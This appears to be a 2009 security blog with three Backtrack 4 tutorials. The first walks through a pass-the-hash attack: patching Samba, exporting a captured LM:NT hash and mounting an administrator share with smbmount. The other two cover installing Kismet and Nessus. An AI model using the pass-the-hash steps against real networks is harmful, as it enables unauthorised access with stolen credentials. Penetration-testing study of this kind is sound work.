Saturday, August 29, 2009

Pass-the-Hash Attack with Backtrack 4

For the uninitiated, a pass-the-hash attack is a way to gain access to a Windows machine without having to supply user credentials. Sounds great yeah? Cool, now you can go ahead and delete Cain and john because your password cracking days are over? Well, not quite. Before you get too excited you should realize there's a catch -- you must first have in your possession a password hash of the machine that you want to compromise. So now you're probably asking yourself, "Why is that useful if I need to have access to the box in the first place?" Well, picture this:

Say you were conducting a penetration test on Company X and you were unable to crack the administrator password. Now, like most organizations, Company X is using the same administrator password on all of its machines. So gaining access to this password would allow you to pwn the entire network. Now lets say that Company X believes strongly in security, and has a 20 character random password for their administrator password. So now you're screwed right? Wrong.

By having access to just one machine that holds this master account that is present on all machines (the administrator account in this example), you are able to utilize a pass-the-hash attack by 'passing' just the hash to every other machines on the network. By receiving the hash, Windows believes that you have successfully authenticated and provides you access to the host. Kinda cool huh?

Now that I've given you some background, here's how you go about setting it up on Backtrack 4. There are a few tweaks that need to be made in order for this to work on Backtrack 4.

Pass the Hash Attack Tutorial for Backtrack 4 Users:

1. Download Samba 3.0.22:

2. Download both of the Foofus Samba patches:

3. Extract the samba archive where you would like to access Samba from. I've chosen /opt/

4. From the directory where you have installed Samba (/opt/ for me), patch the appropriate files
# cd /opt/
# patch -p0 <samba-3.0.22-add-user.patch
# patch -p0 <samba-3.0.22-passhash.patch

5. Configure Samba with smbmount
# cd /opt/samba3.0.22/source
# ./configure --with-smbmount

6. Compile/Install Samba (still in the /opt/samba3.0.22/source/ directory)
# make
# make install

7. Create a mount point in order to mount the Windows share
# mkdir /mnt/target

8. Alter the fstab file to allow /mnt/target to be mounted
# pico /etc/fstab
At the bottom of the file add this entry:
none /mnt/target tmpfs defaults 0 0

9. Copy smb.conf to the correct directory
# cp /opt/samba-3.0.22/packaging/Debian/debian-woody/smb.conf /usr/local/samba/lib/smb.conf

10. Mount the target directory
# mount /mnt/target

11. Add your compromised hash to the SMBHASH environment variable
# export SMBHASH="92D887C9910492C3254E2DF489A880E4:7A2EDE4F51B94203984C6BA21239CF63"

Note: The format for this should be "LMHASH:NTHASH"

12. Implement your pass-the-hash attack
# cd /opt/samba3.0.22/source/bin

Usage: smbmount //target-ipaddress/sharename /mount/point -o username=username-associated-with-hash-here

# ./smbmount //$ /mnt/target -o username=administrator

13. Type an arbitrary password
At this point would be asked to supply a password. Type anything you want here -- just make sure its not blank. So, for example, you could just type 'blah' and hit return.
14. Check to see that you have successfully mapped the Windows share
# ls /mnt/target

If you would like a video tutorial on the pass-the-hash technique, please see John Strand's video:

Friday, August 7, 2009

Installing Kismet on Backtrack 4 Pre Release

Backtrack 4 has all the bells and whilstles we love and have come to expect from Backtrack in the past. That said however, as Bakctrack is currenly in a "Pre Realease" version, there are a couple of teething issues with various bits and pieces. One such issue is with Kismet Newcore.

Kismet is our friendly little wireless stumbler that we all love. In Backtrack 4 pre release you may have noticed it is either missing functionality, or just plain doesn't work!

Here is a quick guide for you to download an alternate version of Kismet Newcore and install it on Backtrack 4:

1. Make sure your network adapter is on
# dhclient eth0

2. Change your director to /usr/src to download the Kismet Newcore source code
# cd /usr/src

3. Download the Kismet source using the built-in subversioning software
# svn co kismet

4. Open the newly created kismet directory
# cd kismet

5. Confrigure and make the source code
# ./configure --prefix=/opt && make && make install

6. Now change your directory to where you want kismet to store its logging files
# cd somewhere/useful/for/your/logging/files

7. Run kismet
# /opt/bin/kismet

There you have it! A fresh version of Kismet Newcore installed.

When you run kismet, it will ask you to add a new capture source. You will (typically) add wlan0. This will change however, depending on your hardware.

Wednesday, August 5, 2009

Installing Nessus on Backtrack 4

Here is an easy to follow tutorial on installing nessus on the Backtrack 4 Pre Release. This is courtesy of secure_it at the remote-exploit forums.

First download these packages


(I have chosen debian package because NessusClient- was missing some of dependencies and was not installing correctly.instead the debian package worked like a charm as its upto-date with dependencies and it produces no error at all.

Next register your copy to get plugins update using homefeed and please provide the real mail ID as they will send you the activation key for homefeed.

Regsiter Here

Click accept and enter a valid working email ID.

now we start installing the packages.

root@ThUndErbOLt:~#dpkg -i Nessus-3.2.1-ubuntu804_i386.deb

now configure the certificate & admin user for nessus
root@ThUndErbOLt:~#/opt/nessus/sbin/nessus-mkcert (this is neccessary to communicate between nessus client to nessus daemon/remote host)
(configure options accordingly or just press enter for default)

CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]:IN
Your state or province name [none]: Karnataka
Your location (e.g. town) [Paris]: Bangalore
it should show the message
Congratulations. Your server certificate was properly created.
hit enter to come out

enter information about the user.
Authentication (Pass/Cert)
confirm password:
after configuring the parameters it ask for rule-set.we have configured the admin user having full permissions.if we wants to limit and want to add certain users then we can use rule-set here.
For configuring ruleset please refer to nessus-adduser(8) man page for the rules syntax as it limit the use of nessus.
press ctrl + d
it asks for confirmation.choose y

now start Nessus daemon by using
root@ThUndErbOLt:~# /etc/init.d/nessusd start
$Starting Nessus : .

confirm that its running using
root@ThUndErbOLt:~# netstat -ant|grep 1241
tcp 0 0* LISTEN
tcp6 0 0 :::1241 :::* LISTEN

now Install NessusClient(the GUI Frontend to use nessusd)
root@ThUndErbOLt:~# dpkg -i NessusClient-3.2.1-debian4_i386.deb

now register the plugin feed for updating nessus
root@ThUndErbOLt:~#/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX(replace X with your keys)
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from
now it will download the plugins and will purge them into database.if you don't wan't to do this ctrl + c to cancel it.later you can download it using


run the scan using NessusClient
backtrack menu->Internet->NessusClient
click on + icon
by default selected radiobox is single host
type Host Name localhost & hit save
select the localhost & press connect
from connect option box choose edit
set the Login & Password which we created earlier using nessus-adduser
hit Save
select localhost & hit connect
first time it asks for logging into nessus server.hit yes

now you can customize the default scan/microsoft scan policy and can scan.that's it!

***note if you are having dependency issues with the Nessus Client use the following command: apt-get update